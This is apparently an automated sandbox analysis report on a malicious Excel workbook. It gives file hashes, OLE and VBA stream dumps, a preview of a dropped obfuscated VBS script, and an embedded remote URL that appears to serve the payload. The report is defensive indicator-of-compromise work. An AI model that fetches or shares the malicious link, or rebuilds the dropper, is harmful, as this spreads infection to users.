                                                                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (378), with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):142260
                                                                                                                                                                                Entropy (8bit):3.6754384164261458
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:kWgwsSmx5nYZjuEoBz/Ib3qBgnM4zBkzLSCL/egt5pzWGwm:pBuYZjubgL6gnMmSfSCLGgt5pyGwm
                                                                                                                                                                                MD5:3EB10EDFAAA09C17D81B1DA5B336684B
                                                                                                                                                                                SHA1:13D5D78340551543986CB92DAB870D552287745B
                                                                                                                                                                                SHA-256:C5F2960ED833EABA3A8B95A0F4253EFBE1A7FD96E303D1731EBCB7E0E54623C8
                                                                                                                                                                                SHA-512:7758740C6663B603F4DB1BDCEA22F89F5C307E93754164C3CBC7F8FCCE7CF7B9E2A251F07522EC6DB8488C4D7FC78BCE6A83B47EFE57436E2E1ACF88F7FE9930
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:..........o.e.c.L.L.i.L.W.W.N.i.W.j.e.L. .=. .".z.Z.Z.z.C.G.I.W.r.W.d.L.K.q.P.".....G.q.u.I.P.W.h.o.G.Z.h.P.i.L.P. .=. .".k.t.z.Z.q.x.K.z.A.G.g.N.b.B.L.".....c.g.p.j.P.P.N.h.K.u.q.e.L.k.t. .=. .".W.A.S.h.W.I.z.L.c.c.K.h.t.P.z.".....x.C.W.Z.q.o.L.i.k.s.P.m.G.i.q. .=. .".W.K.P.L.L.O.W.d.n.G.p.K.L.p.W.".....b.i.q.x.G.K.G.S.m.c.U.i.L.T.K. .=. .".G.W.c.K.L.L.n.n.k.N.A.G.t.h.A.".....P.i.l.h.e.W.R.A.c.K.L.L.H.k.p. .=. .".K.A.W.I.m.e.P.x.L.e.W.i.W.a.u.".........U.u.i.L.i.L.L.L.W.h.m.p.b.Z.j. .=. .".q.A.e.i.v.h.L.t.B.K.A.h.m.G.x.".....L.b.W.o.o.e.z.L.v.G.G.k.p.L.L. .=. .".d.K.a.K.W.u.u.z.L.o.z.f.c.l.e.".....P.p.G.f.z.i.z.Q.G.G.l.k.L.n.u. .=. .".f.i.W.p.Z.W.o.m.l.c.h.J.Q.x.c.".........W.q.p.L.J.L.n.W.h.Q.c.U.e.i.P. .=. .".i.H.h.f.k.W.G.N.W.i.L.W.z.P.i.".....d.W.z.c.h.u.R.Z.m.W.Z.W.W.l.A. .=. .".S.L.t.H.W.m.J.i.e.W.N.k.e.P.c.".....d.i.t.K.m.q.x.W.q.L.j.K.K.L.i. .=. .".L.d.I.K.G.p.o.k.L.q.h.c.o.j.m.".....L.W.q.P.H.q.b.t.n.e.s.W.g.h.f. .=. .".O.W.N.W.S.U.O.Z.A.W.W.K.S.m.G.".....l.u.K.o.n.t.P.J.P.e.

                                                                                                                                                                                Static File Info

                                                                                                                                                                                General

                                                                                                                                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Nov 25 11:48:53 2024, Security: 1
                                                                                                                                                                                Entropy (8bit):7.826595061214578
                                                                                                                                                                                TrID:
                                                                                                                                                                                • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                                                                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                                                                File name:OC25-11-24.xls
                                                                                                                                                                                File size:204'800 bytes
                                                                                                                                                                                MD5:d923dc9f1abd640e545d1992bef70fb4
                                                                                                                                                                                SHA1:1c69fd2c258f80163dde3aa3b6e96ae9b4a42fa1
                                                                                                                                                                                SHA256:7f8c3780744584bc15d10cd35195cad98506691e51f75714f35a295e7d4ed638
                                                                                                                                                                                SHA512:041a9aa0a93d822e4cd10c02f2b0a6223881ee2f84d581fa548244312c80dee12a5b38354257ecbcf87493feb2f65c1e7b0ba8ce9756041018aae898a21c940b
                                                                                                                                                                                SSDEEP:3072:c1JTHBq6U/6xVsMKgpNc+ZwuURRTd9STL0bfC3LajCe7r7Ssb28HQiR:c1lHBMixiMK6G+ZFrTkC3LajCsfA8
                                                                                                                                                                                TLSH:17140224725BD526E6A714B10FD0C0DB7262FC019F065B5B78E8B74E1E7AE90CE22F46
                                                                                                                                                                                File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                                File Icon

                                                                                                                                                                                Icon Hash:276ea3a6a6b7bfbf

                                                                                                                                                                                Static OLE Info

                                                                                                                                                                                General

                                                                                                                                                                                Document Type:OLE
                                                                                                                                                                                Number of OLE Files:1

                                                                                                                                                                                OLE File "OC25-11-24.xls"

                                                                                                                                                                                Indicators
                                                                                                                                                                                Has Summary Info:
                                                                                                                                                                                Application Name:Microsoft Excel
                                                                                                                                                                                Encrypted Document:True
                                                                                                                                                                                Contains Word Document Stream:False
                                                                                                                                                                                Contains Workbook/Book Stream:True
                                                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                                                Contains ObjectPool Stream:False
                                                                                                                                                                                Flash Objects Count:0
                                                                                                                                                                                Contains VBA Macros:True
                                                                                                                                                                                Summary
                                                                                                                                                                                Code Page:1252
                                                                                                                                                                                Author:
                                                                                                                                                                                Last Saved By:
                                                                                                                                                                                Create Time:2006-09-16 00:00:00
                                                                                                                                                                                Last Saved Time:2024-11-25 11:48:53
                                                                                                                                                                                Creating Application:Microsoft Excel
                                                                                                                                                                                Security:1
                                                                                                                                                                                Document Summary
                                                                                                                                                                                Document Code Page:1252
                                                                                                                                                                                Thumbnail Scaling Desired:False
                                                                                                                                                                                Contains Dirty Links:False
                                                                                                                                                                                Shared Document:False
                                                                                                                                                                                Changed Hyperlinks:False
                                                                                                                                                                                Application Version:786432

                                                                                                                                                                                Streams with VBA

                                                                                                                                                                                VBA File Name: Sheet1.cls, Stream Size: 977
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                                                                                                VBA File Name:Sheet1.cls
                                                                                                                                                                                Stream Size:977
                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                                                                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1e 82 fa 18 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                VBA Code
                                                                                                                                                                                Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                                VBA File Name: Sheet2.cls, Stream Size: 977
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                                                                                                VBA File Name:Sheet2.cls
                                                                                                                                                                                Stream Size:977
                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                                                                                                                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1e 82 be b6 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                VBA Code
                                                                                                                                                                                Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                                VBA File Name: Sheet3.cls, Stream Size: 977
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                                                                                                VBA File Name:Sheet3.cls
                                                                                                                                                                                Stream Size:977
                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                                                                                                                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1e 82 c1 cb 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                VBA Code
                                                                                                                                                                                Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                                VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                                                                VBA File Name:ThisWorkbook.cls
                                                                                                                                                                                Stream Size:985
                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                                                                                                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1e 82 e7 40 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                VBA Code
                                                                                                                                                                                Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                                Streams

                                                                                                                                                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:\x1CompObj
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Stream Size:114
                                                                                                                                                                                Entropy:4.25248375192737
                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Stream Size:244
                                                                                                                                                                                Entropy:2.889430592781307
                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                                                                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                                                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:\x5SummaryInformation
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Stream Size:200
                                                                                                                                                                                Entropy:3.2341247550157988
                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . @ . . 0 ? . . . . . . . . .
                                                                                                                                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                                Stream Path: MBd00033107/\x1CompObj, File Type: data, Stream Size: 99
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:MBd00033107/\x1CompObj
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Stream Size:99
                                                                                                                                                                                Entropy:3.631242196770981
                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Stream Path: MBd00033107/Package, File Type: Microsoft Excel 2007+, Stream Size: 123682
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:MBd00033107/Package
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:Microsoft Excel 2007+
                                                                                                                                                                                Stream Size:123682
                                                                                                                                                                                Entropy:7.966670715574804
                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                Data ASCII:P K . . . . . . . . . . ! . . . . . & . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 b1 a6 ef bc 83 01 00 00 26 05 00 00 13 00 df 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 db 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Stream Path: MBd00033108/\x1Ole, File Type: data, Stream Size: 724
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:MBd00033108/\x1Ole
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Stream Size:724
                                                                                                                                                                                Entropy:5.54422407510831
                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                Data ASCII:. . . . f k . h . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . p . r . o . v . i . t . . . u . k . / . O . A . f . f . U . i . ? . & . c . h . a . i . r . l . i . f . t . = . b . u . s . y . & . c . o . c . k . p . i . t . = . b . l . u . s . h . i . n . g . & . p . r . e . c . i . p . i . t . a . t . i . o . n . = . h . o . n . o . r . a . b . l . e . & . s . k . i . l . l . = . q . u . i . z . z . i . c . a . l . & . t . i . m . e . o . u . t . . . 4 . f ! V . . D > U c
                                                                                                                                                                                Data Raw:01 00 00 02 af a5 66 6b df be 68 07 00 00 00 00 00 00 00 00 00 00 00 00 9c 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 98 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 70 00 72 00 6f 00 76 00 69 00 74 00 2e 00 75 00 6b 00 2f 00 4f 00 41 00 66 00 66 00 55 00 69 00 3f 00 26 00 63 00 68 00 61 00 69 00 72 00 6c 00 69 00 66 00 74 00 3d 00 62 00 75 00 73 00 79 00
                                                                                                                                                                                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 64679
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:Workbook
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                Stream Size:64679
                                                                                                                                                                                Entropy:7.983712136188715
                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . ) . . . % e h . . C F . Z @ . H Z Y E [ . g v j b H . D . . . . . . . . . . . \\ . p . F . . U ) * 9 . b E ' Z p . . 7 . . . & . K . e 9 ( z d . N I w - : ( e G . F i . h ` a R O S F . t . . U . . } B . . . ! t a . . . . . . . = . . . . . Y . . . q & . > Z . T * $ . . . . . . . . . } . . . . Z T . . . . % n . . . 5 . . . | = . . . . . { $ d . . % @ D . ; . @ . . . . . . . " . . . I . . . . . . . . . ^ . . . . 1 . . . M ( . . . n X J J 2 v P ( $ e 1 .
                                                                                                                                                                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 b3 29 1a a1 15 05 f2 25 65 68 c2 93 0e 43 e0 ec 46 0e 5a e9 d0 40 18 48 8d 5a 59 a2 45 db 5b 80 e5 05 67 b1 76 6a 9c 62 f5 a1 48 85 f8 09 bd 44 e1 00 02 00 b0 04 c1 00 02 00 89 0d e2 00 00 00 5c 00 70 00 ba 9a 46 0e fc c3 e6 83 b5 8d 9d e2 c1 a0 55 29 d3 2a aa ab 39 15 62 e6 c6 45 c6 27 5a 70
                                                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 523
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Stream Size:523
                                                                                                                                                                                Entropy:5.238239839742505
                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                Data ASCII:I D = " { A 7 7 2 2 A D 3 - 3 7 F 1 - 4 8 D 7 - 8 C 9 A - E 3 9 1 F 0 F 3 2 C 4 8 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 A 8 8 6 C 0 E C 8 1 2 C 8 1 2 C
                                                                                                                                                                                Data Raw:49 44 3d 22 7b 41 37 37 32 32 41 44 33 2d 33 37 46 31 2d 34 38 44 37 2d 38 43 39 41 2d 45 33 39 31 46 30 46 33 32 43 34 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Stream Size:104
                                                                                                                                                                                Entropy:3.0488640812019017
                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                                                                                                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Stream Size:2644
                                                                                                                                                                                Entropy:3.9879678210198795
                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                                                                                                                Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Stream Size:553
                                                                                                                                                                                Entropy:6.37016823888119
                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . O V i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
